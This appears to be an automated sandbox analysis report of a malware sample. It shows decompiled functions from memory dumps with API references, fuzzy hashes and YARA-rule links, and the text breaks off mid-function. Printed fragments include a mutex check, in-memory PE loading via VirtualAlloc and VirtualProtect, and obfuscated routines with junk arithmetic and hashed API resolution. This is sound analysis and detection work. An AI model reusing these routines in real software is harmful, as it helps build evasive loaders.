0x00000000
0x6f33bb70
0x6f33bb5c
0x00000000

APIs

GetNativeSystemInfo.KERNELBASE(?,-00000017,03516CC0,00000000), ref: 6F33BBD9
VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 6F33BC0F
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 6F33BC21
HeapAlloc.KERNEL32(00000000), ref: 6F33BC39
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33BC51

Part of subcall function 6F33B840: SetLastError.KERNEL32(0000000D,6F33BCAC), ref: 6F33B846

VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 6F33BCC1
SetLastError.KERNEL32(0000000D), ref: 6F33BDDC
HeapFree.KERNEL32(00000000), ref: 6F33BE49
SetLastError.KERNEL32(0000000D,-00000017,03516CC0,00000000), ref: 6F33C0B5

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$ErrorLast$FreeHeap$InfoNativeSystem
String ID:
API String ID: 2732102410-0
Opcode ID: f7a2dbd473ffd9adaa41add3c532116eae56c38b9ec38d1a17cfe695227dbcf6
Instruction ID: a4cd92ac346512d323ba736ab6a7455bb7ce459325df4d3f3fd8312928c66a15
Opcode Fuzzy Hash: f7a2dbd473ffd9adaa41add3c532116eae56c38b9ec38d1a17cfe695227dbcf6
Instruction Fuzzy Hash: D5127A72E00A699FDB14CFA8D980B99B7F5FF48304F14416AE919AF385D731E851CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F321000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F321000() {
				long _t2;
				intOrPtr* _t4;

				CreateMutexA(0, 1, "7ce3e80173264ea19b05306b865eadf9"); // executed
				_t2 = GetLastError();
				 *_t4 =  *_t4 + _t2;
				return _t2;
			}

0x6f32100b
0x6f321011
0x6f321017
0x6f32101a

APIs

CreateMutexA.KERNELBASE(00000000,00000001,7ce3e80173264ea19b05306b865eadf9,6F321029,6F3210E6,6F339D3B,00000001,00000000), ref: 6F32100B
GetLastError.KERNEL32 ref: 6F321011

Strings

@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F321011

Memory Dump Source

Source File: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastMutex
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9
API String ID: 1925916568-2035636723
Opcode ID: aaad836b8cc22b8836ae5a60480b51050951a8181b995f518962d26f9405bbbd
Instruction ID: 5239fefcc64cace85d83dc8fe7b42495a62c8a8ad1df4698b8c3e4ef46e40a0b
Opcode Fuzzy Hash: aaad836b8cc22b8836ae5a60480b51050951a8181b995f518962d26f9405bbbd
Instruction Fuzzy Hash: DCC04CB014CA00ABDF405B60D84DB343A79AB83762F00452CB2418C084D6A204608B61

Uniqueness

Uniqueness Score: -1.00%

Function 6F34288D, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F34288D(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t18 = __ecx;
				_push(__ecx);
				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6F342856(_t26) - _t26 >> 1;
					_t7 = E6F3427A9(0, 0, _t26, E6F342856(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6F33FEB1(_t18, _t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6F3427A9(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6F33FEFF(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F342896
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F342904

Part of subcall function 6F3427A9: WideCharToMultiByte.KERNEL32(?,00000000,6F34084A,00000000,00000001,6F3407E3,6F343ABD,?,6F34084A,?,00000000,?,6F343834,0000FDE9,00000000,?), ref: 6F34284B

Part of subcall function 6F33FEB1: RtlAllocateHeap.NTDLL(00000000,6F37E844,6F37E824,?,6F33C421,0000BC00,6F37E844,00000000), ref: 6F33FEE3

_free.LIBCMT ref: 6F3428F5

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: cf8fed61f270c3f1cc611cdef3e44e5db6ef3f1ebf6a222767f6bc10c0420c53
Instruction ID: fecc4264358a28a132710811a26812051b9203021867339da49bfc131ee75c77
Opcode Fuzzy Hash: cf8fed61f270c3f1cc611cdef3e44e5db6ef3f1ebf6a222767f6bc10c0420c53
Instruction Fuzzy Hash: E601A773E057657B672155BA0E88CBF2AEDDEC7AB43120229FE14E2245EF62CC1191F4

Uniqueness

Uniqueness Score: -1.00%

Function 100231D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E100231D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10022523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E10002309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x100231da
0x100231df
0x100231e1
0x100231e4
0x100231e7
0x100231e8
0x100231e9
0x100231ec
0x100231ef
0x100231f2
0x100231f3
0x100231f4
0x100231f7
0x100231fa
0x100231fd
0x100231fe
0x10023200
0x10023205
0x1002320f
0x10023214
0x1002321b
0x1002321f
0x10023223
0x1002322a
0x10023231
0x10023235
0x10023241
0x10023249
0x1002324c
0x10023253
0x1002325a
0x1002325e
0x10023265
0x1002326c
0x10023273
0x1002327a
0x10023281
0x100232a1
0x100232bb
0x100232c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 100232BB

Memory Dump Source

Source File: 00000004.00000002.362078785.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.362072045.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.362109770.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: db286c9e9bcad3bd2e87b522c53d89c9dfc5ed19f2ace101bae5327955dfaec9
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 21311476801248BBCF65DF96CD49CDFBFB5FB89704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33B860, Relevance: 1.6, APIs: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6F33B860(void* __ebx, intOrPtr* __ecx, void** __edx, void* __edi, void* __esi) {
				signed int _v8;
				long _v12;
				signed int _t20;
				int _t32;
				signed int _t41;
				intOrPtr* _t42;
				signed int _t45;
				long _t52;
				unsigned int _t54;
				void* _t56;
				signed int _t57;

				_t42 = __ecx;
				_t20 =  *0x6f36609c; // 0xe6b94de
				_v8 = _t20 ^ _t57;
				_t52 = __edx[2];
				if(_t52 == 0) {
					L8:
					return E6F33C65E(_v8 ^ _t57);
				} else {
					_t54 = __edx[3];
					if((_t54 & 0x02000000) == 0) {
						_t45 =  *(((_t54 >> 0x0000001d & 0x00000001) << 4) + 0x6f34d178);
						_t31 =  ==  ? _t45 : _t45 | 0x00000200;
						_t32 = VirtualProtect( *__edx, _t52,  ==  ? _t45 : _t45 | 0x00000200,  &_v12); // executed
						if(_t32 != 0) {
							goto L8;
						} else {
							return E6F33C65E(_v8 ^ _t57);
						}
					} else {
						_t56 =  *__edx;
						if(_t56 == __edx[1]) {
							if(__edx[4] != 0) {
								L6:
								 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x20))))(_t56, _t52, 0x4000,  *((intOrPtr*)(_t42 + 0x34))); // executed
							} else {
								_t41 =  *(__ecx + 0x40);
								if( *((intOrPtr*)( *__ecx + 0x38)) == _t41 || _t52 % _t41 == 0) {
									goto L6;
								}
							}
						}
						goto L8;
					}
				}
			}

0x6f33b860
0x6f33b866
0x6f33b86d
0x6f33b872
0x6f33b877
0x6f33b8ba
0x6f33b8cd
0x6f33b879
0x6f33b879
0x6f33b882
0x6f33b8d9
0x6f33b8f0
0x6f33b8f7
0x6f33b8ff
0x00000000
0x6f33b901
0x6f33b910
0x6f33b910
0x6f33b884
0x6f33b884
0x6f33b889
0x6f33b890
0x6f33b8a6
0x6f33b8b3
0x6f33b892
0x6f33b894
0x6f33b89a
0x00000000
0x00000000
0x6f33b89a
0x6f33b8b8
0x00000000
0x6f33b889
0x6f33b882

APIs

VirtualProtect.KERNELBASE(?,?,?,?,00000000,?,?,6F33C016), ref: 6F33B8F7

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0e7bf8c7c866222d2d4cce016b8086a241ab32ae6031b847046b2dcf271d8835
Instruction ID: 315195008d810a7bfb2a8515a6963466f8f86a0f695561378e1603704fe9669c
Opcode Fuzzy Hash: 0e7bf8c7c866222d2d4cce016b8086a241ab32ae6031b847046b2dcf271d8835
Instruction Fuzzy Hash: 1C11AF32E005659BEB00DE69D880B5AB7A9EF85314F1501AAE8189F251DB32FD41C780

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x1000424e
0x10004254
0x1000425b
0x10004262
0x10004269
0x10004272
0x10004277
0x1000427c
0x10004283
0x1000428a
0x10004291
0x10004298
0x100042a2
0x100042aa
0x100042ad
0x100042b1
0x100042b5
0x100042bc
0x100042c3
0x100042c7
0x100042e7
0x100042f1

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

Memory Dump Source

Source File: 00000004.00000002.362078785.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.362072045.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.362109770.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F3401B7, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6F3401B7(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6f37e7c8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6F342E3C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6F3401A4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6F342A43(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

APIs

RtlAllocateHeap.NTDLL(00000008,0000BC00,00000000,?,6F3411DC,00000001,00000364,00000006,000000FF,?,6F33C421,0000BC00,6F37E844,00000000), ref: 6F3401F8

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4dda0b2343b0a6ecb35d1bd7ca127bcedb2d964320ceba13734b20b6522d1108
Instruction ID: 28cb2c5900f9084211105f27fb9d5ab4116849ced50d5f2a0d0b2780c17b8dda
Opcode Fuzzy Hash: 4dda0b2343b0a6ecb35d1bd7ca127bcedb2d964320ceba13734b20b6522d1108
Instruction Fuzzy Hash: 0EF0B4B5744B2466EB115A26CD00F8F3BCCAFA2770B00A116AC24FA1C0CB31F5008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33FEB1, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F33FEB1(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6F3401A4(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6f37e7c8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6F342E3C();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6F342A43(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,6F37E844,6F37E824,?,6F33C421,0000BC00,6F37E844,00000000), ref: 6F33FEE3

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a028a5cac9db95b790e5116d3e4594e9c87ffc44b6435b9b66b53007d1537e4f
Instruction ID: 44acedf11ad891d511b2cf7769b888398b499b563befddfe533ce8b7a3702605
Opcode Fuzzy Hash: a028a5cac9db95b790e5116d3e4594e9c87ffc44b6435b9b66b53007d1537e4f
Instruction Fuzzy Hash: 5CE0A0329003F057AB14D6799D00B8B7A8C9FD27A4B510111EC54A66D2DB21E94086A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33E93F, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F33E93F(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E6F33FEFF(_a4); // executed
				return _t5;
			}

0x6f33e948
0x6f33e952
0x6f33e95b

APIs

_free.LIBCMT ref: 6F33E952

Part of subcall function 6F33FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 25859c18ab612c5f0631ce58c7b6183bdee4517b4cbaaa23e1fa741b9d1b91b5
Instruction ID: c99c2b234332a6e526b9bb9050638fc7fa81460bd869047cb5e6a72161cafabb
Opcode Fuzzy Hash: 25859c18ab612c5f0631ce58c7b6183bdee4517b4cbaaa23e1fa741b9d1b91b5
Instruction Fuzzy Hash: 4CC08C3280434CBBCB04CF89E806A5EBBA8DBC0364F200288FC0C07340DF72AE1096C0

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x100117d2
0x100117d5
0x100117d7
0x100117db
0x100117dc
0x100117e1
0x100117e8
0x100117f1
0x100117f8
0x100117ff
0x10011803
0x10011807
0x1001180e
0x1001181b
0x10011822
0x10011825
0x1001182c
0x10011833
0x10011844
0x10011847
0x10011859
0x1001185c
0x10011863
0x1001186a
0x1001186e
0x10011881
0x1001188d
0x10011893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000004.00000002.362078785.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.362072045.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.362109770.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Function 6F33BA90, Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F33BA90(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x6f33ba9f
0x6f33baa6

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 6F33BA9F

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 44fc5bb0c1d1a62d11c81fb144fcc1f492cc837208bf038e9c42e3809d70be9f
Instruction ID: 57bf7485508252a036209e3fcedd30fe15292366deecf7c11911783b4d7fac6f
Opcode Fuzzy Hash: 44fc5bb0c1d1a62d11c81fb144fcc1f492cc837208bf038e9c42e3809d70be9f
Instruction Fuzzy Hash: 25C0483200420DFBCF026F81EC0489A7F3AFB092A0B008014FA1844021CB339930ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F33BAB0, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F33BAB0(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x6f33babc
0x6f33bac3

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 6F33BABC

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: d2140575e32442ac2d9b30227b1f844298383c366db2761d1cb39e18f7611a78
Instruction ID: 6d577e6c59795dab6e810a851c3dbfc9282db8057a8d4f822c45715b32d55538
Opcode Fuzzy Hash: d2140575e32442ac2d9b30227b1f844298383c366db2761d1cb39e18f7611a78
Instruction Fuzzy Hash: 55B0923200420CFBCF022F81DC048D93F3EFB092B1B008054FA1C04020CB339574AB80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F34429D, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F34429D(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6f366790) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6F33FEFF(_t46);
							E6F344608( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
